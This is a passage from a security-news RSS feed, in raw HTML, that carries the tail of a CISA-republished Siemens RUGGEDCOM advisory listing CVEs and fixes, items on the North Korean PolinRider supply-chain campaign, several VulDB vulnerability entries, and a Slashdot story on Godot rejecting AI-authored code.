<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/73.html">CWE-73 External Control of File Name or Path</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-26158</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in BusyBox. This vulnerability allows an attacker to modify files outside of the intended extraction directory by crafting a malicious tar archive containing unvalidated hardlink or symlink entries. If the tar archive is extracted with elevated privileges, this flaw can lead to privilege escalation, enabling an attacker to gain unauthorized access to critical system files.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-26158">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/73.html">CWE-73 External Control of File Name or Path</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-35535</a></h3>
<div class="csaf-accordion-content">
<p>In Sudo through 1.9.17p2 before 3e474c2, a failure of a setuid, setgid, or setgroups call, during a privilege drop before running the mailer, is not a fatal error and can lead to privilege escalation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-35535">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/271.html">CWE-271 Privilege Dropping / Lowering Errors</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.4</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-41918</a></h3>
<div class="csaf-accordion-content">
<p>The affected applications stores sensitive information in the browser cache when an authenticated user modify specific configurations. This could allow an authenticated attacker to access sensitive data stored in the browser.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-41918">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/525.html">CWE-525 Use of Web Browser Cache Containing Sensitive Information</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Siemens ProductCERT reported these vulnerabilities to CISA.</li>
</ul>
<hr>
<h2>General Recommendations</h2>
<p>As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity</p>
<hr>
<h2>Additional Resources</h2>
<p>For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories</p>
<hr>
<h2>Terms of Use</h2>
<p>The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.</p>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.</p>
<p>Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolate them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<hr>
<h2>Advisory Conversion Disclaimer</h2>
<p>This ICSA is a verbatim republication of Siemens ProductCERT SSA-253495 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.</p>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-02</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-02</td>
<td>1</td>
<td>Publication Date</td>
</tr>
<tr>
<td>2026-07-07</td>
<td>2</td>
<td>Initial CISA Republication of Siemens ProductCERT SSA-253495 advisory</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[PolinRider: Nordkoreanische Supply-Chain-Attacken missbrauchen npm, Packagist, Go-Module und Chrome-Extensions]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – PolinRider zeigt, wie stark sich Supply-Chain-Angriffe weiterentwickelt haben: Angreifer platzieren dutzende schädliche Pakete und Browser-Erweiterungen in beliebten Ökosystemen wie npm, Packagist, Go-Module und dem Chrome Web Store. Betroffen sind nicht nur Entwickler-Work...]]></description>
<link>https://tsecurity.de/de/3647344/it-security-nachrichten/polinrider-nordkoreanische-supply-chain-attacken-missbrauchen-npm-packagist-go-module-und-chrome-extensions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647344/it-security-nachrichten/polinrider-nordkoreanische-supply-chain-attacken-missbrauchen-npm-packagist-go-module-und-chrome-extensions/</guid>
<pubDate>Sun, 05 Jul 2026 23:52:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polindrider-supplychain-loader.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polindrider-supplychain-loader.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polindrider-supplychain-loader-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polindrider-supplychain-loader-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polindrider-supplychain-loader-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polindrider-supplychain-loader-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polindrider-supplychain-loader-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – PolinRider zeigt, wie stark sich Supply-Chain-Angriffe weiterentwickelt haben: Angreifer platzieren dutzende schädliche Pakete und Browser-Erweiterungen in beliebten Ökosystemen wie npm, Packagist, Go-Module und dem Chrome Web Store. Betroffen sind nicht nur Entwickler-Workstations, sondern auch CI/CD-Pipelines, die Abhängigkeiten automatisch abrufen und ausführen. Das Vorgehen nutzt kompromittierte Maintainer-Accounts, stark obfuscated JavaScript-Loader und mehrstufige […]</p>
<div><a href="https://www.it-boltwise.de/polinrider-nordkoreanische-supply-chain-attacken-missbrauchen-npm-packagist-go-module-und-chrome-extensions.html">... den vollständigen Artikel <strong>»PolinRider: Nordkoreanische Supply-Chain-Attacken missbrauchen npm, Packagist, Go-Module und Chrome-Extensions«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/polinrider-nordkoreanische-supply-chain-attacken-missbrauchen-npm-packagist-go-module-und-chrome-extensions.html">PolinRider: Nordkoreanische Supply-Chain-Attacken missbrauchen npm, Packagist, Go-Module und Chrome-Extensions</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-14650 | connorskees grass up to 0.13.4 UTF-8 Character raw_to_parse_error denial of service (Issue 116 / EUVD-2026-41694)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in connorskees grass up to 0.13.4. The affected element is the function grass_compiler::raw_to_parse_error of the component UTF-8 Character Handler. Executing a manipulation can lead to denial of service.

This vulnerability is tracked as CVE-...]]></description>
<link>https://tsecurity.de/de/3646029/sicherheitsluecken/cve-2026-14650-connorskees-grass-up-to-0134-utf-8-character-rawtoparseerror-denial-of-service-issue-116-euvd-2026-41694/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646029/sicherheitsluecken/cve-2026-14650-connorskees-grass-up-to-0134-utf-8-character-rawtoparseerror-denial-of-service-issue-116-euvd-2026-41694/</guid>
<pubDate>Sun, 05 Jul 2026 02:39:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/connorskees:grass">connorskees grass up to 0.13.4</a>. The affected element is the function <code>grass_compiler::raw_to_parse_error</code> of the component <em>UTF-8 Character Handler</em>. Executing a manipulation can lead to denial of service.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-14650">CVE-2026-14650</a>. The attack is restricted to local execution. Moreover, an exploit is present.

In Issue #117 with similar structure the project maintainer explains: "DoS vulnerabilities are generally fine in Sass compilers -- they are trivially possible with recursive functions, infinite loops, nested mixins, etc. The description here is wrong. Compile time is not expected to be linear relative to the input, and the @extend algorithm is definitionally exponential."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-14651 | connorskees grass up to 0.13.4 visitor denial of service (Issue 117 / EUVD-2026-41695)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in connorskees grass up to 0.13.4. The impacted element is the function grass_compiler::selector::extend/grass_compiler::evaluate::visitor. The manipulation leads to denial of service.

This vulnerability is listed as CVE-2026-14651. The att...]]></description>
<link>https://tsecurity.de/de/3646024/sicherheitsluecken/cve-2026-14651-connorskees-grass-up-to-0134-visitor-denial-of-service-issue-117-euvd-2026-41695/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646024/sicherheitsluecken/cve-2026-14651-connorskees-grass-up-to-0134-visitor-denial-of-service-issue-117-euvd-2026-41695/</guid>
<pubDate>Sun, 05 Jul 2026 02:38:55 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/connorskees:grass">connorskees grass up to 0.13.4</a>. The impacted element is the function <code>grass_compiler::selector::extend/grass_compiler::evaluate::visitor</code>. The manipulation leads to denial of service.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-14651">CVE-2026-14651</a>. The attack must be carried out locally. In addition, an exploit is available.

The project maintainer explains: "DoS vulnerabilities are generally fine in Sass compilers -- they are trivially possible with recursive functions, infinite loops, nested mixins, etc. The description here is wrong. Compile time is not expected to be linear relative to the input, and the @extend algorithm is definitionally exponential."]]></content:encoded>
</item>
<item>
<title><![CDATA[PolinRider: Nordkoreanische Hacker streuen 108 Malware-Pakete über npm & Co.]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Nordkoreanisch verlinkte Angreifer aus der „Contagious Interview“-Kampagne veröffentlichen 108 bösartige Pakete und Browser-Extensions über mehrere Ökosysteme wie npm, Packagist, Go und Chrome. Laut einer aktuellen Analyse bleiben die Aktivitäten aktiv, weil Maintainer-Acco...]]></description>
<link>https://tsecurity.de/de/3645835/it-security-nachrichten/polinrider-nordkoreanische-hacker-streuen-108-malware-pakete-ueber-npm-co/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645835/it-security-nachrichten/polinrider-nordkoreanische-hacker-streuen-108-malware-pakete-ueber-npm-co/</guid>
<pubDate>Sat, 04 Jul 2026 22:07:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polinsider-contagious-interview-108-packages.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polinsider-contagious-interview-108-packages.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polinsider-contagious-interview-108-packages-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polinsider-contagious-interview-108-packages-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polinsider-contagious-interview-108-packages-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polinsider-contagious-interview-108-packages-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-polinsider-contagious-interview-108-packages-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Nordkoreanisch verlinkte Angreifer aus der „Contagious Interview“-Kampagne veröffentlichen 108 bösartige Pakete und Browser-Extensions über mehrere Ökosysteme wie npm, Packagist, Go und Chrome. Laut einer aktuellen Analyse bleiben die Aktivitäten aktiv, weil Maintainer-Accounts kompromittiert und Versionen in legitimen Repositories infiziert werden. Für Teams, die Build-Pipelines und Abhängigkeiten pflegen, verschiebt sich damit die […]</p>
<div><a href="https://www.it-boltwise.de/polinrider-nordkoreanische-hacker-streuen-108-malware-pakete-ueber-npm-co.html">... den vollständigen Artikel <strong>»PolinRider: Nordkoreanische Hacker streuen 108 Malware-Pakete über npm &amp; Co.«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/polinrider-nordkoreanische-hacker-streuen-108-malware-pakete-ueber-npm-co.html">PolinRider: Nordkoreanische Hacker streuen 108 Malware-Pakete über npm &amp; Co.</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[North Korean Hackers Publish 108 Malicious Packages and Extensions in PolinRider Campaign]]></title>
<description><![CDATA[The North Korean threat actors linked to the Contagious Interview campaign have been observed publishing 108 unique packages and web browser extensions spanning npm, Packagist, Go, and Google Chrome as part of an ongoing activity referred to as PolinRider.

"The campaign remains active, and new m...]]></description>
<link>https://tsecurity.de/de/3645286/it-security-nachrichten/north-korean-hackers-publish-108-malicious-packages-and-extensions-in-polinrider-campaign/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645286/it-security-nachrichten/north-korean-hackers-publish-108-malicious-packages-and-extensions-in-polinrider-campaign/</guid>
<pubDate>Sat, 04 Jul 2026 13:53:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The North Korean threat actors linked to the Contagious Interview campaign have been observed publishing 108 unique packages and web browser extensions spanning npm, Packagist, Go, and Google Chrome as part of an ongoing activity referred to as PolinRider.

"The campaign remains active, and new malicious packages are likely to continue appearing as threat actors compromise maintainer accounts,]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Compromise GitHub Maintainer Accounts to Publish PolinRider-Infected Package Versions]]></title>
<description><![CDATA[A widescale escalation in the PolinRider supply‑chain campaign: threat actors have compromised GitHub maintainer accounts to publish infected package versions across multiple ecosystems. The investigation identified 162 malicious release artifacts across 108 unique packages and extensions in npm,...]]></description>
<link>https://tsecurity.de/de/3642727/it-security-nachrichten/hackers-compromise-github-maintainer-accounts-to-publish-polinrider-infected-package-versions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642727/it-security-nachrichten/hackers-compromise-github-maintainer-accounts-to-publish-polinrider-infected-package-versions/</guid>
<pubDate>Fri, 03 Jul 2026 07:08:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A widescale escalation in the PolinRider supply‑chain campaign: threat actors have compromised GitHub maintainer accounts to publish infected package versions across multiple ecosystems. The investigation identified 162 malicious release artifacts across 108 unique packages and extensions in npm, Packagist, Go modules, and a Chrome extension, linking this activity to the broader North Korean Contagious Interview […]</p>
<p>The post <a href="https://gbhackers.com/github-maintainer-accounts/">Hackers Compromise GitHub Maintainer Accounts to Publish PolinRider-Infected Package Versions</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Compromise GitHub Maintainer Accounts to Publish PolinRider-Infected Package Versions]]></title>
<description><![CDATA[A widescale escalation in the PolinRider supply‑chain campaign: threat actors have compromised GitHub maintainer accounts to publish infected package versions across multiple ecosystems. The investigation identified 162 malicious release artifacts across 108 unique packages and extensions in npm,...]]></description>
<link>https://tsecurity.de/de/3642723/it-security-nachrichten/hackers-compromise-github-maintainer-accounts-to-publish-polinrider-infected-package-versions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642723/it-security-nachrichten/hackers-compromise-github-maintainer-accounts-to-publish-polinrider-infected-package-versions/</guid>
<pubDate>Fri, 03 Jul 2026 07:08:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A widescale escalation in the PolinRider supply‑chain campaign: threat actors have compromised GitHub maintainer accounts to publish infected package versions across multiple ecosystems. The investigation identified 162 malicious release artifacts across 108 unique packages and extensions in npm, Packagist, Go…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-compromise-github-maintainer-accounts-to-publish-polinrider-infected-package-versions/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-compromise-github-maintainer-accounts-to-publish-polinrider-infected-package-versions/">Hackers Compromise GitHub Maintainer Accounts to Publish PolinRider-Infected Package Versions</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-58460 | ajith-ab react-native-receive-sharing-intent ContentProvider path traversal (EUVD-2026-41437)]]></title>
<description><![CDATA[A vulnerability was found in ajith-ab react-native-receive-sharing-intent. It has been declared as critical. This affects an unknown part of the component ContentProvider Handler. Such manipulation leads to path traversal. This vulnerability only affects products that are no longer supported by t...]]></description>
<link>https://tsecurity.de/de/3642484/sicherheitsluecken/cve-2026-58460-ajith-ab-react-native-receive-sharing-intent-contentprovider-path-traversal-euvd-2026-41437/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642484/sicherheitsluecken/cve-2026-58460-ajith-ab-react-native-receive-sharing-intent-contentprovider-path-traversal-euvd-2026-41437/</guid>
<pubDate>Fri, 03 Jul 2026 02:07:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/ajith-ab:react-native-receive-sharing-intent">ajith-ab react-native-receive-sharing-intent</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown part of the component <em>ContentProvider Handler</em>. Such manipulation leads to path traversal. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-58460">CVE-2026-58460</a>. Access to the local network is required for this attack to succeed. There is no exploit available.

It is advisable to implement a patch to correct this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[Godot Game Engine No Longer Accepts AI Code]]></title>
<description><![CDATA[The Godot Foundation will stop accepting AI-authored code, agent-submitted pull requests, and AI-generated text in contributor communications after maintainers were overwhelmed by low-effort submissions. "It is time for us to recognize that these problems aren't going away and therefore we need t...]]></description>
<link>https://tsecurity.de/de/3642080/it-security-nachrichten/godot-game-engine-no-longer-accepts-ai-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642080/it-security-nachrichten/godot-game-engine-no-longer-accepts-ai-code/</guid>
<pubDate>Thu, 02 Jul 2026 21:07:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Godot Foundation will stop accepting AI-authored code, agent-submitted pull requests, and AI-generated text in contributor communications after maintainers were overwhelmed by low-effort submissions. "It is time for us to recognize that these problems aren't going away and therefore we need to take steps to reduce the burden on maintainers while ensuring we still have a pipeline to mentor new contributors to become future maintainers," the Godot Foundation said in a blog post. Contributors may still use AI for limited "menial things" if they disclose it, but humans must understand, own, and be able to fix the code they submit. PC Gamer reports: The Foundation says the pileup of Godot pull requests pending review isn't all bad: It's a sign that interest in using and contribution to Godot is increasing. But the influx of contributions authored or submitted by AI is sapping the projects' maintainers of their willingness to confront the "already tedious" work of reviewing pull requests. "If your feedback on PRs is just being absorbed by a machine and not going towards mentoring a potential future maintainer, it becomes much harder to justify spending your free time on PR review," the Foundation said.
 
As the problem becomes increasingly unsustainable, the Godot Foundation says it's in the process of updating its contribution policies, focusing on "adding barriers to low-effort slop" contributions, encouraging maintainers to review code, developing new contributors into future maintainers, and crucially, requiring that all contributions come from humans who are accountable for their code -- and fixing it if it fails. "AI cannot take responsibility, and we can't trust heavy users of AI to understand their code enough to fix it," the Foundation said.
 
The Foundation says we can expect Godot's contributing policy to soon include explicit rejections of AI-authored code, noting that contributors should only use AI assistance for "menial things" and must disclose its use. Additionally, the Foundation will reject any AI-generated text in human-to-human communications, saying it's "a basic principle of respect" -- though it says machine translations "are still acceptable" if the original text was human-authored. "Things change every day with respect to the current suite of AI tools available," the Foundation said. "We will continue taking a conservative approach in our policies towards them, but we will re-evaluate as things evolve."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Godot+Game+Engine+No+Longer+Accepts+AI+Code%3A+https%3A%2F%2Fgames.slashdot.org%2Fstory%2F26%2F07%2F02%2F1839237%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fgames.slashdot.org%2Fstory%2F26%2F07%2F02%2F1839237%2Fgodot-game-engine-no-longer-accepts-ai-code%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://games.slashdot.org/story/26/07/02/1839237/godot-game-engine-no-longer-accepts-ai-code?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-11998 | Google AngularJS 1.2.0-rc.3 Regular Expression angularjs.org incomplete filtering of special elements (Nessus ID 323783)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in Google AngularJS 1.2.0-rc.3. Affected is an unknown function of the file angularjs.org of the component Regular Expression Handler. The manipulation results in incomplete filtering of special elements. This vulnerability only affects products th...]]></description>
<link>https://tsecurity.de/de/3641073/sicherheitsluecken/cve-2026-11998-google-angularjs-120-rc3-regular-expression-angularjsorg-incomplete-filtering-of-special-elements-nessus-id-323783/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641073/sicherheitsluecken/cve-2026-11998-google-angularjs-120-rc3-regular-expression-angularjsorg-incomplete-filtering-of-special-elements-nessus-id-323783/</guid>
<pubDate>Thu, 02 Jul 2026 14:10:40 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/google:angularjs">Google AngularJS 1.2.0-rc.3</a>. Affected is an unknown function of the file <em>angularjs.org</em> of the component <em>Regular Expression Handler</em>. The manipulation results in incomplete filtering of special elements. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-11998">CVE-2026-11998</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
